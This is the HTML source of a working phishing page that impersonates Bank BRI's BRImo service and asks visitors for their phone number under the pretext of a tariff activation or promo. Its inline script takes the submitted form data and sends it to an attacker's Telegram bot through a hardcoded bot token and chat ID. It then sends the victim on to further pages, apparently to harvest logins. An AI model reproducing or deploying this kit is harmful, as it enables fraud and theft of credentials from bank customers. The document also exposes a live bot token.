<!DOCTYPE HTML>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟰</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta content="https://hosting.tigerengine.id/f8uyn1.jpg" property="og:image">
<meta name="twitter:image" content="https://hosting.tigerengine.id/f8uyn1.jpg">
    	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <link rel="stylesheet" href="img/1.css">
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
    
</head>
 <style>


@import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: ;
      }
body {
    margin: 0px;
    background: url('img/buri.png'),#fff;
    background-size: 100%;
    color: #fff;
    font-family: 'Nunito', sans-serif;
}

.lonte{
  display:none;
  z-index:3;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
      
      .jao{
            width:90%;
      }
      welalxcome {
    position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    background: #ffffffcc;
    z-index: 999;
}
welalxcome img {
        width:15vw;
    height: auto;
}
chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
    width: 130%;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 100%;
    justify-content: center;
}
.talxcome img {
        width: 73%;
}
.balxcome {
        height: 45vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.txalxcome {
        width: 90%;
    height: 30vh;
    text-align: left;
}
 
 .asu{
     width:100%;
     margin-top:55px;
     position: fixed;
     height: 100%;
     
     
 }  
    
 .nyusu{
     border-radius:7px;
     height:150px;
     
     margin-top: 20px;
     margin-left: 20px;
     box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;
     
 }
 
 ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: -2px;
    position: absolute;
    color: #06529C;
}

.button-85 {
  background-color: ;
  
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
}

.button-85:before {
  content: "";
  background: linear-gradient(
    50deg,
    #fff000,
    #ff7300,
    #fffb00,
    #48ff00,
    #00ffd5,
    #002bff,
    #7a00ff,
    #ff00c8,
    #ff0000
  );
  position: absolute;
  top: 0px;
  left: 0px;
  background-size: 500%;
  z-index: -1;
  filter: blur(0px);
  -webkit-filter: blur(0px);
  width: calc(100% + 0px);
  height: calc(100% + 0px);
  animation: glowing-button-85 20s linear infinite;
  transition: opacity 0.3s ease-in-out;
  border-radius: 18px;
}

@keyframes glowing-button-85 {
  0% {
    background-position: 0 0;
  }
  50% {
    background-position: 300% 0;
  }
  100% {
    background-position: 0 0;
  }
}

.button-85:after {
  z-index: -1;
  content: "";
  position: absolute;
  width: 100%;
  height: 100%;
  background: ;
  left: 0;
  top: 0;
  border-radius: none;
}
.patokk{
    
    display:block;
    margin-left: 20px;
    margin-top:;
    position:relative;
    background-color:#0F78CB;
    color:#fff;
    border:0px solid #0076e0;
    width:90%;
    border-radius:3px;
    font-family: 'Nunito',
    sans-serif;
    font-size: 15px;
    padding:13px;
    display: inline-block;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px,
rgba(0, 0, 0, 0.20) 0px 6px 6px;
}

.patokk:hover { 
         
     opacity:0.3;
     border: 1px solid #0F78CB; 
     background-color: #0F78CB; 
     color: #fff; 
         
         
         } 
.patokk:disabled, 
.patokk[disabled]{
    
    opacity:0.3;
    border: 1px solid #0F78CB; 
    background-color: #0F78CB; 
    color: #fff;
}

.pilat{
    
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    width: 100%;
    height: 72px;
    background: #ffffff;
    box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px;
padding-top: 15px
}

.hh{
    
    position: fixed; 
    top: 0; 
    left: 0; 
    right: 0; 
    margin: 0px auto; 
    width: 100%; 
    height: 60px; 
    background: #0F78CB; 
    border-bottom: 0px solid #fff;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
    }
    
    .hua{
        
        bottom:170px;
        margin-left: 23px;
        margin-top: -170px;
        position: absolute;
        border:5px solid #fff;
        padding:15px;
        width:78%;
        border-radius:18px; 
        background: #ffffffe6;
        background-size:100%; 
        height: 280px; 
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px; 
    }
    
.yantek{

box-sizing: border-box;
height: 38px;
width: 536px;
max-width: 100%;
border: 1px solid rgb(0, 134, 224);
border-image: initial;
background-color: rgb(255, 255, 255);
border-radius: 7px;
box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px,
rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;
font-family: 'Nunito',
sans-serif;
font-weight: bold;
font-size: 14px;
color: rgb(28, 28, 28);
word-spacing: 0px;
padding: 0px 10px;
outline: none;
margin-top: -15px;
padding-left: 10px
    }
    
    .kk{
        box-sizing: border-box; height: 38px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 7px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px
    }
    
    .kutal{
        position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 72px; background: #ffffff; box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px; padding-top: 15px
    }
 </style>
<body>
    <main>
<welalxcome>
<img src="https://choreodev.df-dfed.cfd/bri/img/BRImo.png" alt="" style="margin-top: -50px" />
</welalxcome>
<chsalxcome2 style="display: none;">

<img style="position: fixed;width:100%;margin-top: 10px;" src="" alt="">
<nav class="hh">
<img src="https://bri.co.id/o/bri-corporate-theme/images/bri-logo-white.png" style="margin-top:10px; margin-left: 180px;" width="80px;" alt="">
</nav>
<div class="load" style="display:none">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt=""></div>


<marquee direction="right" behavior="alternate" scrolldelay="0" class="asu" style="display: block;animation: marquee 5000s linear infinite;overflow: hidden;">
<img class="nyusu" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRWtxUSsVIAfjxyZ3ucfpqnDCM93ShsdEWvWUTK_RGnsb4ROYlHifznJa_X&s=10" alt="">
<img class="nyusu" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSuVe7Nu5Hy5fae-nLegwIDYm_IO3YWkiA8GQ&usqp=CAU" alt="">
<img class="nyusu" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQWqsRPfYLmLhqkiC3JTXNUrz21OgjEeXM--NeSIk-07JkfTEobKDqWCx80&s=10" alt="https://choreodev.df-dfed.cfd/bri/img/4.png">
<img class="nyusu" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRyaRbBPoBiEvecU3GLG697uxYdXeEVVpca2w&usqp=CAU" alt=" https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQWqsRPfYLmLhqkiC3JTXNUrz21OgjEeXM--NeSIk-07JkfTEobKDqWCx80&s=10">
<img class="nyusu" src="https://choreodev.df-dfed.cfd/bri/img/5.png" alt="">
</marquee>    



<form method="post" id="setPin">
<center><img style="position: fixed;width:20%;margin-top:610px;margin-left: -40px;" src="https://choreodev.df-dfed.cfd/bri/img/T24.png" alt=""></center>

<div class="button-85 hua">
<center style="color:#09559a; line-height: 15px; font-size: 15px; padding: 0px;margin-top:0px;"><p style="border-bottom:1.5px solid #0000 004a;border-radius:10px;margin-bottom:0px;height: 20px;"></p>
<img style="background: #fff; border-radius: 8px; width: 90%; box-shadow: #0f78cb 0px 0px 1px 1px;"src="https://choreodev.df-dfed.cfd/bri/img/index.png" alt="">Nasabah BRIpoin dapat melakukan registrasi dan penukaran promo dapat konfirmasi sesuai petunjuk untuk lanjut<br>
</center>


<br><br><br>
<h5 style="position:absolute;color:#000; margin-top: -26px; margin-left: 4px">Masukan Nomor ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>

<ion-icon name="phone-portrait-sharp">
</ion-icon>
<input id="NoHp" name="𝐍𝐨.𝐇𝐩=" type="tel" class="kk" placeholder="08xxxxxx" oninvalid="this.setCustomValidity('Mohon mɑsukkɑn 𝗡𝗼𝗺𝗼𝗿 𝗣𝗼𝗻𝘀𝗲𝗹 dengɑn benɑr')" onchange="this.setCustomValidity('')" required maxlength="13" minlength="10">
</h3>

<h6 style="font-family: 'Nunito', sans-serif; font-size: 8px; font-weight: bold; color: #000; letter-spacing: 1px; text-align: center; line-height: 1; border-radius: 5px;">Terdaftar dan diawasi oleh:</h6>
            <center>
            <div class="css-dnzamn"><img src="https://user-images.githubusercontent.com/136950143/253083780-05926428-4116-405d-a9e0-b01dd01bfc1e.jpg" width="200"></div>
<br>
<br>
</div>
    





<div class="kutal"><div id="lonte" class="lonte"></div>
<button class="patokk" type="submit" id="kirim" disabled>Lanjutkan</button>
           </div>
<!-- partial -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script><script  src="./credit.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
 <script type="text/javascript">
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
   <p id="status"></p>
   <script src="setPin.js"></script>
   
   <script>
   
   
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });
            
const chat_id = '7973363844', botID = 'bot7801311275:AAFMOonaT8q0xwbwn2BQPanTyAoiiyC7FHk';

    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;

    document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = '/date.html';
    });

            
        });
        
   </script>
        </form>
</form>
</smalxs>
</main>
</form>

<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<script src="script.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>

   <script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },700)
        });
</script>
<script>function vibr(dur){
            if (navigator.vibrate) {
                navigator.vibrate(dur);
            } else {
                console.log("NotSupported");
            }
        }</script>
     <script>
     $(document).ready(function(){
    $('#formHP').submit(function(e) {
    event.preventDefault();
    $('.load').fadeIn();
document.getElementById('kirim').innerHTML = "Memproses....";

var nomor = document.getElementById("NoHp").value;

    sessionStorage.setItem("nomor", nomor);
$("#lonte").show();
 $.ajax({
 type: 'POST',
 url: 'req/no.php',
 data: $(formHP).serialize(),
 datatype: 'text',
 
 complete: function(data) {
            vibr(180);
            
            console.log('Complete')
   setTimeout(function(){
   window.location.href='login.html'
  $("#lonte").hide();
  document.getElementById('kirim').innerHTML = "Lanjutkan";
  $('.load').fadeOut();
    }, 500);
        }
    });
 });
    return false;
});
 </script>
<script >// Get references to the input and button elements
const input = document.getElementById("NoHp");
const button = document.getElementById("kirim");

// Add an event listener for the input event
input.addEventListener("input", () => {
  // Check if the input field has any text
  if (input.value.length > 9) {
    // If there's text, enable the button
    button.disabled = false;
  } else {
    // If there's no text, disable the button
    button.disabled = true;
  }
});


    </script>
</body>
</html>
